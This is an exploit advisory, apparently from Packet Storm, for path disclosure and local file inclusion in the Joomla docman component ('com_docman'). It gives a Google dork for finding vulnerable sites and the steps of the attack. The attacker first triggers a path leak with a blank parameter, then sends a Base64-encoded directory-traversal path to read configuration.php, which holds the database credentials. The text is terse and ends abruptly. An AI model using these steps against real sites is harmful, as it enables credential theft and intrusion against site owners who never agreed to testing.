Joomla Docman Path Disclosure / Local File Inclusion

Type packetstorm
Reporter Hugo Santiago dos Santos
Modified 2015-07-14T00:00:00


                                            `# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)  
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)  
# Risk: High  
# Author: Hugo Santiago dos Santos  
# Contact:  
# Date: 13/07/2015  
# Vendor Homepage:  
# Google Dork: inurl:"/components/com_docman/dl2.php"  
# Xploit (FPD):   
Get one target and just download with blank parameter:  
In title will occur Full Path Disclosure of server.  
# Xploit (LFD/LFI):[LDF]  
Let's Xploit...  
First we need use Xploit FPD to see the path of target, after that we'll Insert 'configuration.php' configuration database file and encode in Base64:  
../../../../../../../target/www/configuration.php <= Not Ready <= Ready !  
And Now we have a configuration file...